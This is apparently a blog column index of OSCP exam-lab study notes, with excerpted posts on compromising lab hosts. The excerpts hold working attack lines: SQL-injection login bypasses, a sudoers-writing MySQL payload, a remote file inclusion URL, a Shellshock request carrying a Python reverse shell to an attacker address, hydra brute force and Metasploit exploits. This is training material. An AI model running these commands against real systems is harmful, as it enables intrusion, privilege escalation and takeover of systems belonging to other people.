OSCP
OCSP考证过程中的笔记记录。
白夜鬼魅
安全建设、安全运营,专业蓝队
展开
-
花了1000个小时才考过的安全证书,这是总结出来的精髓笔记。
10.11.1.139 root 搜索思路windows下:certutil.exe -urlcache -split -f "http://$IP/Powerless.bat" Powerless.bat windows下载文件for /r Users %i in (*.ps1) do @echo %i 查找文件for /r c:/ %i in (*.txt) do @echo %ifindstr /s /i /n "aad3b435b51404eeaad3b435b51404ee" *.* ...原创 2021-11-06 10:18:45 · 771 阅读 · 0 评论 -
渗透测试防御-sql万能密码、mysql提权
http://10.11.1.252:8000登陆后台用123' or 1=1 #或者123' or '1'='1绕过登陆 获取用户名密码j0hnbzuisJDnuI6WUDlsshj0hn@10.11.1.252 -p 22000跑一下提权脚本,linEnum.sh,发现mysql以root权限在运行。lordoftherootselectdo_system('echo "j0hn ALL =(ALL) NOPASSWD: ALL">> /etc...原创 2021-11-05 11:49:53 · 839 阅读 · 0 评论 -
网络防御与对抗-wp漏洞利用
wpscan-u http://10.11.1.251/wp/ --enumeratevpvt是扫描主题漏洞扫描插件漏洞wp-forum - SQL Injection参考连接:Wordpress wp-forum plugin SQL Injection - CXSecurity.comhttp://10.11.1.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_c...原创 2021-11-05 11:48:08 · 838 阅读 · 0 评论 -
网络攻防-wp cms利用
http://10.11.1.234/wp-login.php?redirect_to=http%3A%2F%2F10.11.1.234%2Fwp-admin%2Fusers.php&reauth=1wpscan可以爆破密码admin princess修改Appearance 404.php为以下shellhttps://www.jb51.net/article/17844.htm访问任意不存在页面即可反弹,http://10.11.1.234/?p=9991...原创 2021-11-05 11:46:29 · 761 阅读 · 0 评论 -
网络防御与学习-tomcat 默认密码利用
10.11.1.209Nikto扫描得到:Defaultaccount found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 'tomcat'). Apache Tomcat.访问8080端口,找到后台登录地址,尝试tomcat tomcat顺利登录后台。Apache Tomcat - Account Scanner / 'PUT' Request Command Execution - Mu...原创 2021-11-05 11:43:36 · 568 阅读 · 0 评论 -
渗透测试三合一-仅供参考
10.11.1.141搜索webmin,确定使用2017.plperl2017.pl 10.11.1.141 10000 /root/proof.txtloading1 (alice)BUGZBUNNY (bob)10.11.1.145完成nmap-p 445 --script vuln 10.11.1.145CVE-2009-3103msf搜索用:exploit/windows/smb/ms09_050_sm...原创 2021-11-05 11:38:23 · 1302 阅读 · 0 评论 -
渗透测试学习-Remote File Inclusion shell
http://10.11.1.133/1f2e73705207bdd6467e109c1606ed29-21213/111111111/slogin_lib.inc.php?slogin_path=http://10.11.0.86/Let's kick shell-ish, Part 2: Remote File Inclusion shell – Techorganic – Musings from the brainpancat /etc/fstab搜索 reiserfs explo.原创 2021-11-05 11:34:08 · 1273 阅读 · 0 评论 -
网络渗透测试安全攻防-Cuppa CMS 文件包含漏洞
目录扫描,拿到登陆地址http://10.11.1.116/db/phpliteadmin.php adminphpliteadmin1.9.3PHPLiteAdmin 1.9.3 - Remote PHP Code Injection - PHP webapps ExploitCuppaCMS文件包含漏洞http://10.11.1.116/administrator/alerts/alertConfigField.php?urlConfig=../../../../.....原创 2021-11-05 11:30:48 · 1877 阅读 · 0 评论 -
网络攻防渗透测试-ms11-046 提权
http://10.11.1.73:8014/LICENSE/http://10.11.1.73:8014/content/http://10.11.1.73:8080/php/http://10.11.1.73:8080/PHP/install/install.txt找到账号密码groups Options勾选Personal disk spaceSitesOvidentiaFile upload configuration C:\wamp\www\PHP\...原创 2021-11-05 11:29:24 · 886 阅读 · 0 评论 -
实战渗透测试-james 2.3.2漏洞利用
james2.3.2版本默认账号密码rootnc10.11.1.72 4555set password johnnewpasstelnet 10.11.1.72 110USER johnPASSnewpaslist获得账号密码:ryuuQUHqhUPRKXMo4m7kchsh可以更改用户登陆的shellApache James Server 2.3.2 - Remote Command Execution - Linux remote...原创 2021-11-05 11:28:09 · 1504 阅读 · 0 评论 -
渗透测试网络攻防-apache cgi漏洞利用
cgi-bin扫描路径暴露出:/cgi-bin/wget-qO- -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/python -c 'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.11.0.243\",1234));os.dup2(s.fileno(),0);...原创 2021-11-05 11:26:44 · 2529 阅读 · 0 评论 -
渗透实战-HttpFileServer漏洞利用
nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.49-oX10.11.1.49.xmlxsltproc-o10.11.1.49.html10.11.1.49.xml9505端口运行HttpFileServer服务,搜索HFS得到39161.py修改里面的端口和放置nc.exe得到shell$secpasswd=ConvertTo-SecureString"aliceishere" -As...原创 2021-11-05 11:25:10 · 1815 阅读 · 0 评论 -
渗透测试实战-OTRS 5.0.x/6.0.x漏洞利用
nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.39-oX10.11.1.39.xmlxsltproc-o10.11.1.39.html10.11.1.39.xmlnikto-h 10.11.1.39扫描到/otrs/index.pl 确认版本为5.0.2默认用户(root@localhost),密码是OTRs搜索漏洞OTRS 5.0.x/6.0.x - Remote Command E...原创 2021-11-05 11:21:30 · 741 阅读 · 2 评论 -
实战渗透测试-hydra 爆破 CVE-2010-3847 提权
nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.35 -oX10.11.1.35.xmlxsltproc-o10.11.1.35.html10.11.1.35.xmlhydra -s 22 -v -t 4 -l root -P /usr/share/wordlists/rockyou.txt 10.11.1.35ssh密码爆破https://10.11.1.35/section.php?pa...原创 2021-11-05 11:19:50 · 511 阅读 · 0 评论 -
靶机实战网络攻击---MS17-010利用
nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.31 -oX10.11.1.31.xmlxsltproc-o10.11.1.31.html10.11.1.31.xmlsqlmap-u "http://10.11.1.31/login-off.asp" --data="txtLoginID=amdin&txtPassword=1&cmdSubmit=Login" --dbs--curre...原创 2021-11-05 11:17:14 · 1102 阅读 · 0 评论 -
网络实战攻击-编辑器漏洞利用
nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.24 -oX10.11.1.24.xmlxsltproc-o10.11.1.24.html10.11.1.24.xml爆破目录发现后台登陆界面:http://10.11.1.24/admin.php弱密码:admin admin编辑器上传文件:http://10.11.1.24/admin.php?target=template_editor通...原创 2021-11-05 11:12:44 · 329 阅读 · 0 评论 -
网络实战攻击-Samba 远程缓冲区溢出漏洞
nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.22 -oX10.11.1.22.xml搜索远程缓冲区漏洞searchsploitSamba Remote Buffer Overflow选用 cd/usr/share/exploitdb/exploits/linux/remote/7.plperl7.pl -t linx86 -H 10.11.0.243 -h 10.11.1.22进入...原创 2021-11-05 11:08:47 · 1150 阅读 · 0 评论 -
网络渗透测试-使用put方法
以下均为实际攻击过程,记录笔记,仅供学习参考nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.13 -oX10.11.1.13.xml扫描nc10.11.1.13 80OPTIONS /script/ HTTP/1.1Host:10.11.1.13检测开启了put方法nikto-hhttp://192.168.179.142/dav/检测put方法s检测是否开启put方法...原创 2021-11-05 11:05:42 · 1293 阅读 · 0 评论 -
实战攻击之CVE-2010-2861 网络攻击实战
nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.10 -oX10.11.1.10.xmlxsltproc扫描之后得到CVE:CVE-2010-2861Google搜索后得到Adobe ColdFusion - Directory Traversal - Multiple remote Exploithttps://github.com/ctfs/write-ups-2014/tree/master/d...原创 2021-11-05 11:02:00 · 394 阅读 · 0 评论 -
实战攻击-php反弹shell
以下均为实际攻击过程,记录笔记,仅供学习参考whatweb10.11.1.8:80cms识别dirbhttp://10.11.1.8/ 目录扫描dirbuster输入链接,选择线程,使用字典,选择字典,设置fuzz为dir/{dir}开始扫描Python3 dirsearch.py -uurl-e php扫描目录得到http://10.11.1.8/internal/ 目录,查看源码发现/internal/advanced_c...原创 2021-11-05 11:00:12 · 3577 阅读 · 0 评论 -
实战攻击-永恒之蓝
nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.7-oX 10.11.1.7.xml格式转换:xsltproc-o118.190.244.96.html118.190.244.96.xmlms08-067方案一:msfconsolesearch ms08-067use exploit/windows/smb/ms08_067_netapishow payloadsset ...原创 2021-11-05 10:57:13 · 1188 阅读 · 0 评论